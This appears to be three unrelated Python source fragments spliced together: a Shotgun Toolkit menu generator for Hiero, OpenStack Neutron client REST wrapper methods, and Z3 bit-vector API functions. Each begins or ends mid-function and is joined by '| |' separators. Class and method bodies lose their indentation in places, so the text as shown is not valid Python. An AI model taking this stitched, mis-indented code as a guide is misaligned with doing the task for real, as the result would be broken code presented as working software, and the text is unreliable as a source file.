        msg = ("Shotgun integration is currently disabled because the file you "
               "have opened is not recognized. Shotgun cannot "
               "determine which Context the currently-open file belongs to. "
               "In order to enable Toolkit integration, try opening another "
               "file. <br><br><i>Details:</i> %s" % details)
        self._disable_menu("[Toolkit is disabled - Click for details]", msg)

    def create_disabled_menu(self, cmd_name, msg):
        """
        Implemented in deriving classes to create a "disabled" menu.

        :param cmd_name: An AppCommand object to associate with the disabled
                         menu command.
        :param msg: A message explaining why Toolkit is disabled.
        """
        self.engine.logger.debug(
            'Not implemented: %s.%s',
            self.__class__.__name__,
            'create_disabled_menu'
        )

    def _disable_menu(self, cmd_name, msg):
        """
        Disables the Shotgun menu.

        :param cmd_name: An AppCommand object to associate with the disabled
                         menu command.
        :param msg: A message explaining why Toolkit is disabled.
        """
        if self._menu_handle:
            self.destroy_menu()
        self.create_disabled_menu(cmd_name, msg)

    def _jump_to_sg(self):
        """
        Jump from a context to Shotgun.
        """
        from tank.platform.qt import QtCore, QtGui
        url = self.engine.context.shotgun_url
        QtGui.QDesktopServices.openUrl(QtCore.QUrl(url))

    def _jump_to_fs(self):
        """
        Jump from a context to the filesystem.
        """
        paths = self.engine.context.filesystem_locations
        for disk_location in paths:
            system = sys.platform
            # Fix: Python 3 reports "linux" (Python 2 reported "linux2");
            # startswith() covers both instead of raising OSError on Linux.
            if system.startswith("linux"):
                cmd = 'xdg-open "%s"' % disk_location
            elif system == "darwin":
                cmd = 'open "%s"' % disk_location
            elif system == "win32":
                cmd = 'cmd.exe /C start "Folder" "%s"' % disk_location
            else:
                raise OSError("Platform '%s' is not supported." % system)
            exit_code = os.system(cmd)
            if exit_code != 0:
                self.engine.logger.error("Failed to launch '%s'!", cmd)
# -----------------------------------------------------------------------------
class HieroMenuGenerator(BaseMenuGenerator):
"""
A Hiero specific menu generator.
"""
def __init__(self, engine, menu_name):
    """
    Initializes a new menu generator.

    :param engine: The currently-running engine.
    :type engine: :class:`tank.platform.Engine`
    :param menu_name: The name of the menu to be created.
    """
    super(HieroMenuGenerator, self).__init__(engine, menu_name)
    # The QMenu created by _create_hiero_menu(); None while no menu exists.
    self._menu_handle = None
    # Maps context-menu setting names to the AppCommands shown there.
    self._context_menus_to_apps = dict()
def _create_hiero_menu(self, add_commands=True, commands=None):
    """
    Creates the "Shotgun" menu in Hiero.

    :param bool add_commands: If True, menu commands will be added to the
        newly-created menu. If False, the menu will be created, but no
        contents will be added. Defaults to True.
    :param dict commands: The engine commands to add to the various menus.
        The dictionary is structured the same as engine.commands is, where
        the key is the name of the command, and the value is a dictionary
        of command properties.
    """
    import hiero
    if self._menu_handle is not None:
        self.destroy_menu()
    from sgtk.platform.qt import QtGui
    self._menu_handle = QtGui.QMenu("Shotgun")
    # Insert the Shotgun menu just before Hiero's "Cache" menu.
    cache_action = hiero.ui.findMenuAction("Cache")
    menu_bar = hiero.ui.menuBar()
    menu_bar.insertMenu(cache_action, self._menu_handle)
    self._menu_handle.clear()
    # If we were asked not to add any commands to the menu,
    # then bail out.
    if not add_commands:
        return
    # Now add the context item on top of the main menu.
    self._context_menu = self._add_context_menu()
    self._menu_handle.addSeparator()
    if not commands:
        return
    # Now enumerate all items and create menu objects for them.
    menu_items = []
    for (cmd_name, cmd_details) in commands.items():
        menu_items.append(HieroAppCommand(self.engine, cmd_name, cmd_details))
    # Now add favourites.
    for fav in self.engine.get_setting("menu_favourites"):
        app_instance_name = fav["app_instance"]
        menu_name = fav["name"]
        # Scan through all menu items.
        for cmd in menu_items:
            if cmd.app_instance_name == app_instance_name and cmd.name == menu_name:
                # Found our match!
                cmd.add_command_to_menu(self._menu_handle)
                # Mark as a favourite item.
                cmd.favourite = True
    # Get the apps for the various context menus.
    self._context_menus_to_apps = {
        "bin_context_menu": [],
        "timeline_context_menu": [],
        "spreadsheet_context_menu": [],
    }
    remove = set()
    # Fix: dict.iteritems() is Python-2 only and raises AttributeError on
    # Python 3; items() behaves correctly on both.
    for (key, apps) in self._context_menus_to_apps.items():
        items = self.engine.get_setting(key)
        for item in items:
            app_instance_name = item["app_instance"]
            menu_name = item["name"]
            # Scan through all menu items.
            for (i, cmd) in enumerate(menu_items):
                if cmd.app_instance_name == app_instance_name and cmd.name == menu_name:
                    # Found the match.
                    apps.append(cmd)
                    cmd.requires_selection = item["requires_selection"]
                    if not item["keep_in_menu"]:
                        remove.add(i)
                    break
    # Delete from the end so earlier indices remain valid.
    for index in sorted(remove, reverse=True):
        del menu_items[index]
    # Register for the interesting events.
    hiero.core.events.registerInterest(
        "kShowContextMenu/kBin",
        self.eventHandler,
    )
    hiero.core.events.registerInterest(
        "kShowContextMenu/kTimeline",
        self.eventHandler,
    )
    # Note that the kViewer works differently than the other things
    # (returns a hiero.ui.Viewer object: http://docs.thefoundry.co.uk/hiero/10/hieropythondevguide/api/api_ui.html#hiero.ui.Viewer)
    # so we cannot support this easily using the same principles as for the other things.
    hiero.core.events.registerInterest(
        "kShowContextMenu/kSpreadsheet",
        self.eventHandler,
    )
    self._menu_handle.addSeparator()
    # Now go through all of the menu items.
    # Separate them out into various sections.
    commands_by_app = {}
    for cmd in menu_items:
        if cmd.type == "context_menu":
            cmd.add_command_to_menu(self._context_menu)
        else:
            # Normal menu.
            app_name = cmd.app_name
            if app_name is None:
                # Unparented app.
                app_name = "Other Items"
            if app_name not in commands_by_app:
                commands_by_app[app_name] = []
            commands_by_app[app_name].append(cmd)
    # Now add all apps to main menu.
    self._add_app_menu(commands_by_app)
def create_menu(self, add_commands=True):
    """
    Creates the "Shotgun" menu in Hiero.

    :param add_commands: If True, menu commands will be added to the newly
        created menu; if False the menu is created empty. Defaults to True.
    """
    self._create_hiero_menu(
        add_commands=add_commands,
        commands=self.engine.commands,
    )
def destroy_menu(self):
    """
    Destroys the "Shotgun" menu.

    Removes the menu from Hiero's menu bar and unregisters the context-menu
    event handlers that were registered by the menu-creation routine.
    """
    import hiero
    menuBar = hiero.ui.menuBar()
    # Remove the menu's action from the bar before dropping our handle.
    menuBar.removeAction(self._menu_handle.menuAction())
    self._menu_handle.clear()
    self._menu_handle = None
    # Unregister the interesting events (mirrors the registration order).
    hiero.core.events.unregisterInterest(
        "kShowContextMenu/kBin",
        self.eventHandler,
    )
    hiero.core.events.unregisterInterest(
        "kShowContextMenu/kTimeline",
        self.eventHandler,
    )
    # Note that the kViewer works differently than the other things
    # (returns a hiero.ui.Viewer object: http://docs.thefoundry.co.uk/hiero/10/hieropythondevguide/api/api_ui.html#hiero.ui.Viewer)
    # so we cannot support this easily using the same principles as for the other things.
    hiero.core.events.unregisterInterest(
        "kShowContextMenu/kSpreadsheet",
        self.eventHandler,
    )
def eventHandler(self, event):
    """
    The engine's Hiero-specific event handler. This is called by Hiero when
    events are triggered, which then handles running SGTK-specific event
    behaviors.

    :param event: The Hiero event object that was triggered.
    """
    # Map the event subtype to the configured command bucket. Fix: an
    # unknown subtype previously fell through to `if not cmds` with `cmds`
    # unbound, raising NameError; now it is ignored.
    subtype_to_setting = {
        "kBin": "bin_context_menu",
        "kTimeline": "timeline_context_menu",
        "kSpreadsheet": "spreadsheet_context_menu",
    }
    setting_key = subtype_to_setting.get(event.subtype)
    if setting_key is None:
        return
    cmds = self._context_menus_to_apps[setting_key]
    if not cmds:
        return
    event.menu.addSeparator()
    # A disabled "Shotgun" action acts as a section header.
    menu = event.menu.addAction("Shotgun")
    menu.setEnabled(False)
    for cmd in cmds:
        enabled = True
        if cmd.requires_selection:
            # Disable commands that need a selection when nothing is selected.
            if hasattr(event.sender, "selection") and not event.sender.selection():
                enabled = False
        cmd.sender = event.sender
        cmd.event_type = event.type
        cmd.event_subtype = event.subtype
        cmd.add_command_to_menu(event.menu, enabled)
    event.menu.addSeparator()
def _add_context_menu(self):
    """
    Adds a context menu which displays the current context.

    :returns: the created QMenu with "Jump to Shotgun" (and, when file
        system locations exist, "Jump to File System") actions attached.
    """
    ctx = self.engine.context
    if ctx.entity is None:
        # Project-only context, e.g. "Demo Project"
        ctx_name = "%s" % ctx.project["name"]
    elif ctx.step is None and ctx.task is None:
        # entity only
        # e.g. Shot ABC_123
        ctx_name = "%s %s" % (ctx.entity["type"], ctx.entity["name"])
    else:
        # we have either step or task
        task_step = None
        if ctx.step:
            task_step = ctx.step.get("name")
        if ctx.task:
            # The task name wins over the step name when both are set.
            task_step = ctx.task.get("name")
        # e.g. [Lighting, Shot ABC_123]
        ctx_name = "%s, %s %s" % (task_step, ctx.entity["type"], ctx.entity["name"])
    # create the menu object
    ctx_menu = self._menu_handle.addMenu(ctx_name)
    action = ctx_menu.addAction("Jump to Shotgun")
    action.triggered.connect(self._jump_to_sg)
    if ctx.filesystem_locations:
        action = ctx_menu.addAction("Jump to File System")
        action.triggered.connect(self._jump_to_fs)
    ctx_menu.addSeparator()
    return ctx_menu
def _add_app_menu(self, commands_by_app):
"""
Add all apps to the main menu.
:param commands_by_app: A dict containing a key for each active
app paired with its AppCommand object to be
added to the menu.
"""
for app_name in sorted(commands_by_app.keys()):
if len(commands_by_app[app_name]) > 1:
# | |
flavor."""
return self.delete(self.flavor_path % (flavor))
# ---- Service flavors & flavor profiles --------------------------------------
# Thin REST delegations: each method formats a path template held on the
# client and forwards to get/put/post/delete/list.
def list_flavors(self, retrieve_all=True, **_params):
    """Fetches a list of all Neutron service flavors for a project."""
    return self.list('flavors', self.flavors_path, retrieve_all,
                     **_params)
def show_flavor(self, flavor, **_params):
    """Fetches information for a certain Neutron service flavor."""
    return self.get(self.flavor_path % (flavor), params=_params)
def update_flavor(self, flavor, body):
    """Update a Neutron service flavor."""
    return self.put(self.flavor_path % (flavor), body=body)
def associate_flavor(self, flavor, body):
    """Associate a Neutron service flavor with a profile."""
    return self.post(self.flavor_profile_bindings_path %
                     (flavor), body=body)
def disassociate_flavor(self, flavor, flavor_profile):
    """Disassociate a Neutron service flavor with a profile."""
    return self.delete(self.flavor_profile_binding_path %
                       (flavor, flavor_profile))
def create_service_profile(self, body=None):
    """Creates a new Neutron service flavor profile."""
    return self.post(self.service_profiles_path, body=body)
def delete_service_profile(self, flavor_profile):
    """Deletes the specified Neutron service flavor profile."""
    return self.delete(self.service_profile_path % (flavor_profile))
def list_service_profiles(self, retrieve_all=True, **_params):
    """Fetches a list of all Neutron service flavor profiles."""
    return self.list('service_profiles', self.service_profiles_path,
                     retrieve_all, **_params)
# ---- Provider networks and segmentation-id ranges ---------------------------
def list_providernet_types(self, retrieve_all=True, **_params):
    """Fetches a list of all supported provider network types."""
    # Pass filters in "params" argument to do_request
    return self.list('providernet_types',
                     self.providernet_types_path, retrieve_all,
                     **_params)
def list_providernets(self, retrieve_all=True, **_params):
    """Fetches a list of all provider networks."""
    # Pass filters in "params" argument to do_request
    return self.list('providernets', self.providernets_path, retrieve_all,
                     **_params)
def list_networks_on_providernet(self, id, **_params):
    """Fetches a list of networks hosted by provider networks."""
    # NOTE(review): parameter name `id` shadows the builtin; kept for
    # backwards compatibility with keyword callers.
    return self.get((self.providernet_path + self.PNET_BINDINGS) % id,
                    params=_params)
def show_providernet(self, providernet, **_params):
    """Fetches information of a certain provider network."""
    return self.get(self.providernet_path % (providernet), params=_params)
def create_providernet(self, body=None):
    """Creates a new provider network."""
    return self.post(self.providernets_path, body=body)
def update_providernet(self, providernet, body=None):
    """Updates a provider network."""
    return self.put(self.providernet_path % (providernet), body=body)
def delete_providernet(self, providernet):
    """Deletes the specified provider network."""
    return self.delete(self.providernet_path % (providernet))
def list_providernet_ranges(self, retrieve_all=True, **_params):
    """Fetches a list of all provider network segmentation id ranges."""
    # Pass filters in "params" argument to do_request
    return self.list('providernet_ranges',
                     self.providernet_ranges_path, retrieve_all,
                     **_params)
def show_providernet_range(self, range, **_params):
    """Fetches information of a provider network segmentation range."""
    # NOTE(review): `range` shadows the builtin; kept for API compatibility.
    return self.get(self.providernet_range_path % (range), params=_params)
def create_providernet_range(self, body=None):
    """Creates a new provider network segmentation id range."""
    return self.post(self.providernet_ranges_path, body=body)
def update_providernet_range(self, range, body=None):
    """Updates a provider network segmentation id range."""
    return self.put(self.providernet_range_path % (range), body=body)
def delete_providernet_range(self, range):
    """Deletes the specified provider network segmentation id range."""
    return self.delete(self.providernet_range_path % (range))
# ---- Service-profile details, availability zones, auto-allocated topology ---
def show_service_profile(self, flavor_profile, **_params):
    """Fetches information for a certain Neutron service flavor profile."""
    return self.get(self.service_profile_path % (flavor_profile),
                    params=_params)
def update_service_profile(self, service_profile, body):
    """Update a Neutron service profile."""
    return self.put(self.service_profile_path % (service_profile),
                    body=body)
def list_availability_zones(self, retrieve_all=True, **_params):
    """Fetches a list of all availability zones."""
    return self.list('availability_zones', self.availability_zones_path,
                     retrieve_all, **_params)
# The decorator transparently renames the legacy 'tenant_id' keyword.
@debtcollector.renames.renamed_kwarg(
    'tenant_id', 'project_id', replace=True)
def get_auto_allocated_topology(self, project_id, **_params):
    """Fetch information about a project's auto-allocated topology."""
    return self.get(
        self.auto_allocated_topology_path % project_id,
        params=_params)
@debtcollector.renames.renamed_kwarg(
    'tenant_id', 'project_id', replace=True)
def delete_auto_allocated_topology(self, project_id, **_params):
    """Delete a project's auto-allocated topology."""
    return self.delete(
        self.auto_allocated_topology_path % project_id,
        params=_params)
@debtcollector.renames.renamed_kwarg(
    'tenant_id', 'project_id', replace=True)
def validate_auto_allocated_topology_requirements(self, project_id):
    """Validate requirements for getting an auto-allocated topology."""
    # The server performs the validation when asked for the 'dry-run' field.
    return self.get_auto_allocated_topology(project_id, fields=['dry-run'])
# ---- BGP speakers and peers -------------------------------------------------
def list_bgp_speakers(self, retrieve_all=True, **_params):
    """Fetches a list of all BGP speakers for a project."""
    return self.list('bgp_speakers', self.bgp_speakers_path, retrieve_all,
                     **_params)
def show_bgp_speaker(self, bgp_speaker_id, **_params):
    """Fetches information of a certain BGP speaker."""
    return self.get(self.bgp_speaker_path % (bgp_speaker_id),
                    params=_params)
def create_bgp_speaker(self, body=None):
    """Creates a new BGP speaker."""
    return self.post(self.bgp_speakers_path, body=body)
def update_bgp_speaker(self, bgp_speaker_id, body=None):
    """Update a BGP speaker."""
    return self.put(self.bgp_speaker_path % bgp_speaker_id, body=body)
def delete_bgp_speaker(self, speaker_id):
    """Deletes the specified BGP speaker."""
    return self.delete(self.bgp_speaker_path % (speaker_id))
# The add/remove operations below are PUT sub-resource actions on a speaker.
def add_peer_to_bgp_speaker(self, speaker_id, body=None):
    """Adds a peer to BGP speaker."""
    return self.put((self.bgp_speaker_path % speaker_id) +
                    "/add_bgp_peer", body=body)
def remove_peer_from_bgp_speaker(self, speaker_id, body=None):
    """Removes a peer from BGP speaker."""
    return self.put((self.bgp_speaker_path % speaker_id) +
                    "/remove_bgp_peer", body=body)
def add_network_to_bgp_speaker(self, speaker_id, body=None):
    """Adds a network to BGP speaker."""
    return self.put((self.bgp_speaker_path % speaker_id) +
                    "/add_gateway_network", body=body)
def remove_network_from_bgp_speaker(self, speaker_id, body=None):
    """Removes a network from BGP speaker."""
    return self.put((self.bgp_speaker_path % speaker_id) +
                    "/remove_gateway_network", body=body)
def add_vpn_to_bgp_speaker(self, speaker_id, body=None):
    """Adds a VPN to BGP speaker."""
    return self.put((self.bgp_speaker_path % speaker_id) +
                    "/add_bgp_vpn", body=body)
def remove_vpn_from_bgp_speaker(self, speaker_id, body=None):
    """Removes a VPN from BGP speaker."""
    return self.put((self.bgp_speaker_path % speaker_id) +
                    "/remove_bgp_vpn", body=body)
def list_route_advertised_from_bgp_speaker(self, speaker_id, **_params):
    """Fetches a list of all routes advertised by BGP speaker."""
    return self.get((self.bgp_speaker_path % speaker_id) +
                    "/get_advertised_routes", params=_params)
def list_bgp_peers(self, **_params):
    """Fetches a list of all BGP peers."""
    return self.get(self.bgp_peers_path, params=_params)
def show_bgp_peer(self, peer_id, **_params):
    """Fetches information of a certain BGP peer."""
    return self.get(self.bgp_peer_path % peer_id,
                    params=_params)
def create_bgp_peer(self, body=None):
    """Create a new BGP peer."""
    return self.post(self.bgp_peers_path, body=body)
def update_bgp_peer(self, bgp_peer_id, body=None):
    """Update a BGP peer."""
    return self.put(self.bgp_peer_path % bgp_peer_id, body=body)
def delete_bgp_peer(self, peer_id):
    """Deletes the specified BGP peer."""
    return self.delete(self.bgp_peer_path % peer_id)
# ---- Network IP availability and resource tagging ---------------------------
def list_network_ip_availabilities(self, retrieve_all=True, **_params):
    """Fetches IP availability information for all networks"""
    return self.list('network_ip_availabilities',
                     self.network_ip_availabilities_path,
                     retrieve_all, **_params)
def show_network_ip_availability(self, network, **_params):
    """Fetches IP availability information for a specified network"""
    return self.get(self.network_ip_availability_path % (network),
                    params=_params)
def add_tag(self, resource_type, resource_id, tag, **_params):
    """Add a tag on the resource."""
    return self.put(self.tag_path % (resource_type, resource_id, tag))
def replace_tag(self, resource_type, resource_id, body, **_params):
    """Replace tags on the resource."""
    return self.put(self.tags_path % (resource_type, resource_id), body)
def remove_tag(self, resource_type, resource_id, tag, **_params):
    """Remove a tag on the resource."""
    return self.delete(self.tag_path % (resource_type, resource_id, tag))
def remove_tag_all(self, resource_type, resource_id, **_params):
    """Remove all tags on the resource."""
    return self.delete(self.tags_path % (resource_type, resource_id))
# ---- Trunk ports and their subports -----------------------------------------
def create_trunk(self, body=None):
    """Create a trunk port."""
    return self.post(self.trunks_path, body=body)
def update_trunk(self, trunk, body=None):
    """Update a trunk port."""
    return self.put(self.trunk_path % trunk, body=body)
def delete_trunk(self, trunk):
    """Delete a trunk port."""
    return self.delete(self.trunk_path % (trunk))
def list_trunks(self, retrieve_all=True, **_params):
    """Fetch a list of all trunk ports."""
    return self.list('trunks', self.trunks_path, retrieve_all,
                     **_params)
def show_trunk(self, trunk, **_params):
    """Fetch information for a certain trunk port."""
    return self.get(self.trunk_path % (trunk), params=_params)
def trunk_add_subports(self, trunk, body=None):
    """Add specified subports to the trunk."""
    return self.put(self.subports_add_path % (trunk), body=body)
def trunk_remove_subports(self, trunk, body=None):
    """Removes specified subports from the trunk."""
    return self.put(self.subports_remove_path % (trunk), body=body)
def trunk_get_subports(self, trunk, **_params):
    """Fetch a list of all subports attached to given trunk."""
    return self.get(self.subports_path % (trunk), params=_params)
# ---- BGP VPNs and their network/router associations -------------------------
def list_bgpvpns(self, retrieve_all=True, **_params):
    """Fetches a list of all BGP VPNs for a project"""
    return self.list('bgpvpns', self.bgpvpns_path, retrieve_all, **_params)
def show_bgpvpn(self, bgpvpn, **_params):
    """Fetches information of a certain BGP VPN"""
    return self.get(self.bgpvpn_path % bgpvpn, params=_params)
def create_bgpvpn(self, body=None):
    """Creates a new BGP VPN"""
    return self.post(self.bgpvpns_path, body=body)
def update_bgpvpn(self, bgpvpn, body=None):
    """Updates a BGP VPN"""
    return self.put(self.bgpvpn_path % bgpvpn, body=body)
def delete_bgpvpn(self, bgpvpn):
    """Deletes the specified BGP VPN"""
    return self.delete(self.bgpvpn_path % bgpvpn)
def list_bgpvpn_network_assocs(self, bgpvpn, retrieve_all=True, **_params):
    """Fetches a list of network associations for a given BGP VPN."""
    return self.list('network_associations',
                     self.bgpvpn_network_associations_path % bgpvpn,
                     retrieve_all, **_params)
def show_bgpvpn_network_assoc(self, bgpvpn, net_assoc, **_params):
    """Fetches information of a certain BGP VPN's network association"""
    return self.get(
        self.bgpvpn_network_association_path % (bgpvpn, net_assoc),
        params=_params)
def create_bgpvpn_network_assoc(self, bgpvpn, body=None):
    """Creates a new BGP VPN network association"""
    return self.post(self.bgpvpn_network_associations_path % bgpvpn,
                     body=body)
def update_bgpvpn_network_assoc(self, bgpvpn, net_assoc, body=None):
    """Updates a BGP VPN network association"""
    return self.put(
        self.bgpvpn_network_association_path % (bgpvpn, net_assoc),
        body=body)
def delete_bgpvpn_network_assoc(self, bgpvpn, net_assoc):
    """Deletes the specified BGP VPN network association"""
    return self.delete(
        self.bgpvpn_network_association_path % (bgpvpn, net_assoc))
def list_bgpvpn_router_assocs(self, bgpvpn, retrieve_all=True, **_params):
    """Fetches a list of router associations for a given BGP VPN."""
    return self.list('router_associations',
                     self.bgpvpn_router_associations_path % bgpvpn,
                     retrieve_all, **_params)
def show_bgpvpn_router_assoc(self, bgpvpn, router_assoc, **_params):
    """Fetches information of a certain BGP VPN's router association"""
    return self.get(
        self.bgpvpn_router_association_path % (bgpvpn, router_assoc),
        params=_params)
def create_bgpvpn_router_assoc(self, bgpvpn, body=None):
    """Creates a new BGP VPN router association"""
    return self.post(self.bgpvpn_router_associations_path % bgpvpn,
                     body=body)
def update_bgpvpn_router_assoc(self, bgpvpn, router_assoc, body=None):
    """Updates a BGP VPN router association"""
    return self.put(
        self.bgpvpn_router_association_path % (bgpvpn, router_assoc),
        body=body)
def delete_bgpvpn_router_assoc(self, bgpvpn, router_assoc):
    """Deletes the specified BGP VPN router association"""
    return self.delete(
        self.bgpvpn_router_association_path % (bgpvpn, router_assoc))
# ---- SFC port pairs and port pair groups ------------------------------------
def create_sfc_port_pair(self, body=None):
    """Creates a new Port Pair."""
    return self.post(self.sfc_port_pairs_path, body=body)
def update_sfc_port_pair(self, port_pair, body=None):
    """Update a Port Pair."""
    return self.put(self.sfc_port_pair_path % port_pair, body=body)
def delete_sfc_port_pair(self, port_pair):
    """Deletes the specified Port Pair."""
    return self.delete(self.sfc_port_pair_path % (port_pair))
def list_sfc_port_pairs(self, retrieve_all=True, **_params):
    """Fetches a list of all Port Pairs."""
    return self.list('port_pairs', self.sfc_port_pairs_path, retrieve_all,
                     **_params)
def show_sfc_port_pair(self, port_pair, **_params):
    """Fetches information of a certain Port Pair."""
    return self.get(self.sfc_port_pair_path % (port_pair), params=_params)
def create_sfc_port_pair_group(self, body=None):
    """Creates a new Port Pair Group."""
    return self.post(self.sfc_port_pair_groups_path, body=body)
def update_sfc_port_pair_group(self, port_pair_group, body=None):
"""Update a Port Pair Group."""
return self.put(self.sfc_port_pair_group_path % | |
bv.ast), ctx)
else:
ctx = _get_ctx(ctx)
return BitVecNumRef(Z3_mk_numeral(ctx.ref(), _to_int_str(val), BitVecSort(bv, ctx).ast), ctx)
def BitVec(name, bv, ctx=None):
    """Return a bit-vector constant named `name`. `bv` may be the number of bits of a bit-vector sort.
    If `ctx=None`, then the global context is used.
    >>> x = BitVec('x', 16)
    >>> is_bv(x)
    True
    >>> x.size()
    16
    >>> x.sort()
    BitVec(16)
    >>> word = BitVecSort(16)
    >>> x2 = BitVec('x', word)
    >>> eq(x, x2)
    True
    """
    # A BitVecSortRef argument fixes the context itself; a plain bit-width
    # needs the sort to be built in the resolved context.
    if not isinstance(bv, BitVecSortRef):
        ctx = _get_ctx(ctx)
        bv = BitVecSort(bv, ctx)
    else:
        ctx = bv.ctx
    return BitVecRef(Z3_mk_const(ctx.ref(), to_symbol(name, ctx), bv.ast), ctx)
def BitVecs(names, bv, ctx=None):
    """Return a tuple of bit-vector constants of size bv.
    >>> x, y, z = BitVecs('x y z', 16)
    >>> x.size()
    16
    >>> x.sort()
    BitVec(16)
    >>> Sum(x, y, z)
    0 + x + y + z
    >>> Product(x, y, z)
    1*x*y*z
    >>> simplify(Product(x, y, z))
    x*y*z
    """
    context = _get_ctx(ctx)
    # A single space-separated string is split into individual names.
    name_list = names.split(" ") if isinstance(names, str) else names
    return [BitVec(n, bv, context) for n in name_list]
def Concat(*args):
    """Create a Z3 bit-vector concatenation expression.

    Despite the name of the docstring examples, this also accepts
    sequence/string and regular-expression arguments and builds the
    corresponding concatenation for those theories.

    >>> v = BitVecVal(1, 4)
    >>> Concat(v, v+1, v)
    Concat(Concat(1, 1 + 1), 1)
    >>> simplify(Concat(v, v+1, v))
    289
    >>> print("%.3x" % simplify(Concat(v, v+1, v)).as_long())
    121
    """
    args = _get_args(args)
    sz = len(args)
    if z3_debug():
        _z3_assert(sz >= 2, "At least two arguments expected.")

    # Borrow the context from the first argument that is already an
    # expression; plain Python values (e.g. str) carry no context.
    ctx = None
    for a in args:
        if is_expr(a):
            ctx = a.ctx
            break

    # Sequence/string concatenation: coerce every argument to a sequence
    # expression, then build a single n-ary seq.concat node.
    if is_seq(args[0]) or isinstance(args[0], str):
        args = [_coerce_seq(s, ctx) for s in args]
        if z3_debug():
            _z3_assert(all([is_seq(a) for a in args]), "All arguments must be sequence expressions.")
        v = (Ast * sz)()
        for i in range(sz):
            v[i] = args[i].as_ast()
        return SeqRef(Z3_mk_seq_concat(ctx.ref(), sz, v), ctx)

    # Regular-expression concatenation (n-ary re.concat node).
    if is_re(args[0]):
        if z3_debug():
            _z3_assert(all([is_re(a) for a in args]), "All arguments must be regular expressions.")
        v = (Ast * sz)()
        for i in range(sz):
            v[i] = args[i].as_ast()
        return ReRef(Z3_mk_re_concat(ctx.ref(), sz, v), ctx)

    # Bit-vector case: Z3_mk_concat is binary, so left-fold over the args.
    if z3_debug():
        _z3_assert(all([is_bv(a) for a in args]), "All arguments must be Z3 bit-vector expressions.")
    r = args[0]
    for i in range(sz - 1):
        r = BitVecRef(Z3_mk_concat(ctx.ref(), r.as_ast(), args[i+1].as_ast()), ctx)
    return r
def Extract(high, low, a):
    """Create a Z3 bit-vector extraction expression, or create a string extraction expression.

    Bit-vector form: Extract(high, low, bv) keeps bits `high` down to
    `low` (both inclusive).  Sequence form: when the first argument is a
    string or sequence, the call is read as Extract(seq, offset, length).

    >>> x = BitVec('x', 8)
    >>> Extract(6, 2, x)
    Extract(6, 2, x)
    >>> Extract(6, 2, x).sort()
    BitVec(5)
    >>> simplify(Extract(StringVal("abcd"),2,1))
    "c"
    """
    if isinstance(high, str):
        high = StringVal(high)
    if is_seq(high):
        # Sequence form: arguments are (sequence, offset, length).
        s = high
        offset, length = _coerce_exprs(low, a, s.ctx)
        return SeqRef(Z3_mk_seq_extract(s.ctx_ref(), s.as_ast(), offset.as_ast(), length.as_ast()), s.ctx)
    if z3_debug():
        _z3_assert(low <= high, "First argument must be greater than or equal to second argument")
        _z3_assert(_is_int(high) and high >= 0 and _is_int(low) and low >= 0, "First and second arguments must be non negative integers")
        _z3_assert(is_bv(a), "Third argument must be a Z3 bit-vector expression")
    return BitVecRef(Z3_mk_extract(a.ctx_ref(), high, low, a.as_ast()), a.ctx)
def _check_bv_args(a, b):
    """Debug-mode sanity check: at least one of `a`, `b` must be a bit-vector."""
    if not z3_debug():
        return
    _z3_assert(is_bv(a) or is_bv(b), "First or second argument must be a Z3 bit-vector expression")
def ULE(a, b):
    """Create the Z3 expression (unsigned) `other <= self`.

    The infix operator <= builds the *signed* comparison instead.

    >>> x, y = BitVecs('x y', 32)
    >>> ULE(x, y)
    ULE(x, y)
    >>> (x <= y).sexpr()
    '(bvsle x y)'
    >>> ULE(x, y).sexpr()
    '(bvule x y)'
    """
    _check_bv_args(a, b)
    lhs, rhs = _coerce_exprs(a, b)
    ast = Z3_mk_bvule(lhs.ctx_ref(), lhs.as_ast(), rhs.as_ast())
    return BoolRef(ast, lhs.ctx)
def ULT(a, b):
    """Create the Z3 expression (unsigned) `other < self`.

    The infix operator < builds the *signed* comparison instead.

    >>> x, y = BitVecs('x y', 32)
    >>> ULT(x, y)
    ULT(x, y)
    >>> (x < y).sexpr()
    '(bvslt x y)'
    >>> ULT(x, y).sexpr()
    '(bvult x y)'
    """
    _check_bv_args(a, b)
    lhs, rhs = _coerce_exprs(a, b)
    ast = Z3_mk_bvult(lhs.ctx_ref(), lhs.as_ast(), rhs.as_ast())
    return BoolRef(ast, lhs.ctx)
def UGE(a, b):
    """Create the Z3 expression (unsigned) `other >= self`.

    The infix operator >= builds the *signed* comparison instead.

    >>> x, y = BitVecs('x y', 32)
    >>> UGE(x, y)
    UGE(x, y)
    >>> (x >= y).sexpr()
    '(bvsge x y)'
    >>> UGE(x, y).sexpr()
    '(bvuge x y)'
    """
    _check_bv_args(a, b)
    lhs, rhs = _coerce_exprs(a, b)
    ast = Z3_mk_bvuge(lhs.ctx_ref(), lhs.as_ast(), rhs.as_ast())
    return BoolRef(ast, lhs.ctx)
def UGT(a, b):
    """Create the Z3 expression (unsigned) `other > self`.

    The infix operator > builds the *signed* comparison instead.

    >>> x, y = BitVecs('x y', 32)
    >>> UGT(x, y)
    UGT(x, y)
    >>> (x > y).sexpr()
    '(bvsgt x y)'
    >>> UGT(x, y).sexpr()
    '(bvugt x y)'
    """
    _check_bv_args(a, b)
    lhs, rhs = _coerce_exprs(a, b)
    ast = Z3_mk_bvugt(lhs.ctx_ref(), lhs.as_ast(), rhs.as_ast())
    return BoolRef(ast, lhs.ctx)
def UDiv(a, b):
    """Create the Z3 expression (unsigned) division `self / other`.

    The infix operator / builds the *signed* division instead.

    >>> x = BitVec('x', 32)
    >>> y = BitVec('y', 32)
    >>> UDiv(x, y)
    UDiv(x, y)
    >>> UDiv(x, y).sort()
    BitVec(32)
    >>> (x / y).sexpr()
    '(bvsdiv x y)'
    >>> UDiv(x, y).sexpr()
    '(bvudiv x y)'
    """
    _check_bv_args(a, b)
    num, den = _coerce_exprs(a, b)
    ast = Z3_mk_bvudiv(num.ctx_ref(), num.as_ast(), den.as_ast())
    return BitVecRef(ast, num.ctx)
def URem(a, b):
    """Create the Z3 expression (unsigned) remainder `self % other`.

    The infix operator % builds the *signed* modulus; use SRem() for the
    signed remainder.

    >>> x = BitVec('x', 32)
    >>> y = BitVec('y', 32)
    >>> URem(x, y)
    URem(x, y)
    >>> URem(x, y).sort()
    BitVec(32)
    >>> (x % y).sexpr()
    '(bvsmod x y)'
    >>> URem(x, y).sexpr()
    '(bvurem x y)'
    """
    _check_bv_args(a, b)
    num, den = _coerce_exprs(a, b)
    ast = Z3_mk_bvurem(num.ctx_ref(), num.as_ast(), den.as_ast())
    return BitVecRef(ast, num.ctx)
def SRem(a, b):
    """Create the Z3 expression signed remainder.

    The infix operator % builds the *signed* modulus; use URem() for the
